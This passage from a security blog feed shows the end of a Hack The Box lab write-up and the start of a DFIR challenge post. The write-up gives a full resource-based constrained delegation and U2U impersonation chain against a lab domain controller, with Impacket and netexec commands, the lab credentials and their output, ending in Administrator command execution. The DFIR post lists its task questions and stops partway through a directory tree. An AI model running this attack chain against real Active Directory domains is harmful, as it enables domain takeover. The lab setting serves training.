SMB         10.129.234.63   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.63   445    DC               [+] phantom.vl\wsilva:passw0rd</code></pre></div><p>On BloodHound:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Hvvf!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F943dda61-b73c-4dda-a56f-656222e8f658_1922x912.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Hvvf!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F943dda61-b73c-4dda-a56f-656222e8f658_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!Hvvf!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F943dda61-b73c-4dda-a56f-656222e8f658_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!Hvvf!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F943dda61-b73c-4dda-a56f-656222e8f658_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!Hvvf!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F943dda61-b73c-4dda-a56f-656222e8f658_1922x912.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Hvvf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F943dda61-b73c-4dda-a56f-656222e8f658_1922x912.png" width="1456" height="691" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/943dda61-b73c-4dda-a56f-656222e8f658_1922x912.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:691,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:128277,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192474887?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F943dda61-b73c-4dda-a56f-656222e8f658_1922x912.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Hvvf!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F943dda61-b73c-4dda-a56f-656222e8f658_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!Hvvf!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F943dda61-b73c-4dda-a56f-656222e8f658_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!Hvvf!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F943dda61-b73c-4dda-a56f-656222e8f658_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!Hvvf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F943dda61-b73c-4dda-a56f-656222e8f658_1922x912.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>As you can see, we have AddAllowedToAct on the DC computer account, for more deeper here&#8217;s AddAllowedToAct page, for delegations, and RBCD sources.</p><ul><li><p><a href="https://bloodhound.specterops.io/resources/edges/add-allowed-to-act">SpecterOps</a></p></li></ul><p>And from there we can have access to the DC and gain Administrator.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!NGUT!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc170300d-7c80-441c-8933-869f47e5ad7b_1922x912.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!NGUT!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc170300d-7c80-441c-8933-869f47e5ad7b_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!NGUT!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc170300d-7c80-441c-8933-869f47e5ad7b_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!NGUT!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc170300d-7c80-441c-8933-869f47e5ad7b_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!NGUT!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc170300d-7c80-441c-8933-869f47e5ad7b_1922x912.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!NGUT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc170300d-7c80-441c-8933-869f47e5ad7b_1922x912.png" width="1922" height="912" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c170300d-7c80-441c-8933-869f47e5ad7b_1922x912.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:912,&quot;width&quot;:1922,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:169369,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192474887?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a1d90a1-37a6-41d6-b7e4-11281f820280_1922x912.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!NGUT!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc170300d-7c80-441c-8933-869f47e5ad7b_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!NGUT!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc170300d-7c80-441c-8933-869f47e5ad7b_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!NGUT!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc170300d-7c80-441c-8933-869f47e5ad7b_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!NGUT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc170300d-7c80-441c-8933-869f47e5ad7b_1922x912.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>PS: The attack can still be continued, even with MachineAccount Quota reach 0.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc.phantom.vl -u wsilva -p passw0rd -M maq
LDAP        10.129.234.63   389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:phantom.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.234.63   389    DC               [+] phantom.vl\wsilva:passw0rd 
MAQ         10.129.234.63   389    DC               [*] Getting the MachineAccountQuota
MAQ         10.129.234.63   389    DC               MachineAccountQuota: 0</code></pre></div><h3>Practical</h3><ol><li><p><em>Add Delegation to The Computers</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ rbcd.py -delegate-to 'DC$' -delegate-from wsilva -action write phantom/wsilva:passw0rd -dc-ip 10.129.234.63                                                                                                                             
Impacket v0.14.0.dev0+20260306.165346.8c155a5b - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     wsilva       (S-1-5-21-4029599044-1972224926-2225194048-1114)</code></pre></div><ol start="2"><li><p><em>Save the TGT Ticket</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo impacket-getTGT phantom.vl/wsilva:passw0rd                                                                                                                                                                                      
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in wsilva.ccache</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME=wsilva.ccache</code></pre></div><ol start="3"><li><p><em>Modify through &#8220;New Hash&#8220;</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ describeTicket.py wsilva.ccache                                                                                                                                                                                                         
Impacket v0.14.0.dev0+20260306.165346.8c155a5b - Copyright Fortra, LLC and its affiliated companies 

[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : 459a7c14e58373b9b4b0090c999e415f
[*] User Name                     : wsilva
[*] User Realm                    : PHANTOM.VL
[*] Service Name                  : krbtgt/PHANTOM.VL
[*] Service Realm                 : PHANTOM.VL
[*] Start Time                    : 28/03/2026 22:06:09 PM
[*] End Time                      : 29/03/2026 08:06:09 AM
[*] RenewTill                     : 29/03/2026 22:07:05 PM
[*] Flags                         : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType                       : rc4_hmac
[*] Base64(key)                   : RZp8FOWDc7m0sAkMmZ5BXw==
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : krbtgt/PHANTOM.VL
[*]   Service Realm               : PHANTOM.VL
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied

&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ describeTicket.py wsilva.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key            : 459a7c14e58373b9b4b0090c999e415f

&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ changepasswd.py -newhashes :459a7c14e58373b9b4b0090c999e415f phantom/wsilva:passw0rd@dc.phantom.vl                                                                                                                                      
Impacket v0.14.0.dev0+20260306.165346.8c155a5b - Copyright Fortra, LLC and its affiliated companies 

[*] Changing the password of phantom\wsilva
[*] Connecting to DCE/RPC as phantom\wsilva
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).</code></pre></div><ol start="4"><li><p><em>Re-Export and Ask for Administrator Impersonation</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME=wsilva.ccache                                                                                                                                                                                                         

&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo impacket-getST -u2u -impersonate Administrator -spn cifs/DC.phantom.vl phantom.vl/wsilva -k -no-pass                                                                                                                               
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache</code></pre></div><p>And that&#8217;s it, for full success we should&#8217;ve gain Administartor Kerberos key and now we can logon with a ticket.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec smb dc.phantom.vl --use-kcache
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         dc.phantom.vl   445    DC               [+] phantom.vl\Administrator from ccache (Pwn3d!)</code></pre></div><p>Logon Pwn3d!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec smb dc.phantom.vl --use-kcache -X whoami
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         dc.phantom.vl   445    DC               [+] phantom.vl\Administrator from ccache (Pwn3d!)
SMB         dc.phantom.vl   445    DC               [+] Executed command via wmiexec
SMB         dc.phantom.vl   445    DC               phantom\administrator</code></pre></div><p>Happy hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB Holmes 2025 3: The Enduring Echo - DFIR (Easy)]]></title><description><![CDATA[Analyze KAPE output to see the Windows management instrumentation artifacts and persistence left by Black-hat Hackers using the machine to pivot to an internal workstation.]]></description><link>https://byt3n33dl3.substack.com/p/htb-holmes-2025-3-the-enduring-echo</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-holmes-2025-3-the-enduring-echo</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Sat, 21 Mar 2026 13:08:05 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!yQI7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!yQI7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!yQI7!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png 424w, https://substackcdn.com/image/fetch/$s_!yQI7!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png 848w, https://substackcdn.com/image/fetch/$s_!yQI7!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png 1272w, https://substackcdn.com/image/fetch/$s_!yQI7!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!yQI7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png" width="334" height="334" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:800,&quot;width&quot;:800,&quot;resizeWidth&quot;:334,&quot;bytes&quot;:267182,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189512062?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!yQI7!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png 424w, https://substackcdn.com/image/fetch/$s_!yQI7!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png 848w, https://substackcdn.com/image/fetch/$s_!yQI7!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png 1272w, https://substackcdn.com/image/fetch/$s_!yQI7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e0b12f7-4e9e-4717-8c7b-d8642129ecec_800x800.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><em>From HTB:</em> LeStrade passes a disk image to Holmes. It's one of the identified breach points, now showing abnormal CPU activity and anomalies in process logs.</p><p>Tools:</p><ul><li><p>Chainsaw</p></li></ul><p>Key Learning:</p><ul><li><p>Microsoft Log Analysis</p></li><li><p>WMiC Analysis</p></li><li><p>Attack Trial</p></li><li><p>Purple Teaming</p></li></ul><h2>Task</h2><ol><li><p>What was the first (non cd) command executed by the attacker on the host?</p></li><li><p>Which parent process (full path) spawned the attacker&#8217;s commands?</p></li><li><p>Which remote-execution tool was most likely used for the attack?</p></li><li><p>What was the attacker&#8217;s IP address?</p></li><li><p>The attacker established multiple persistence mechanisms. What is set as the name of the earliest one created?</p></li><li><p>Identify the script executed by the persistence mechanism.</p></li><li><p>What local account did the attacker create?</p></li><li><p>What domain name did the attacker use for credential exfiltration?</p></li><li><p>What password did the attacker&#8217;s script generate for the newly created user?</p></li><li><p>What was the IP address of the internal system the attacker pivoted to?</p></li><li><p>Which TCP port on the victim was forwarded to enable the pivot?</p></li><li><p>What is the full registry path that stores persistent IPv4&#8594;IPv4 TCP listener-to-target mappings?</p></li><li><p>What is the MITRE ATT&amp;CK ID associated with the previous technique used by the attacker to pivot to the internal system?</p></li><li><p>Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this?</p></li></ol><p>Let&#8217;s do it, let&#8217;s see what we get.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ll
total 504532
-rw-rw-r-- 1 kali kali 516633693 Mar  1 01:28 EnduringEcho.zip</code></pre></div><p>Quite big for an Easy sherlocks!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ tree .
.
&#9500;&#9472;&#9472; 2025-08-25T20_20_59_5246365_ConsoleLog.txt
&#9500;&#9472;&#9472; 2025-08-25T20_20_59_5246365_CopyLog.csv
&#9500;&#9472;&#9472; 2025-08-25T20_20_59_5246365_SkipLog.csv.csv
&#9500;&#9472;&#9472; C
&#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; $Boot
&#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; $Extend
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; $J
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; $Max
&#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; $LogFile
&#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; $MFT
&#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; $Secure_$SDS
&#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ProgramData
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Microsoft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; search
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; data
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; applications
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; windows
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; edb00009.jtx
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; edb0000A.jtx
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; edb0000B.jtx
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; edb.jcp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; edb.jtx
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; edbres00001.jrs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; edbtmp.jtx
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; GatherLogs
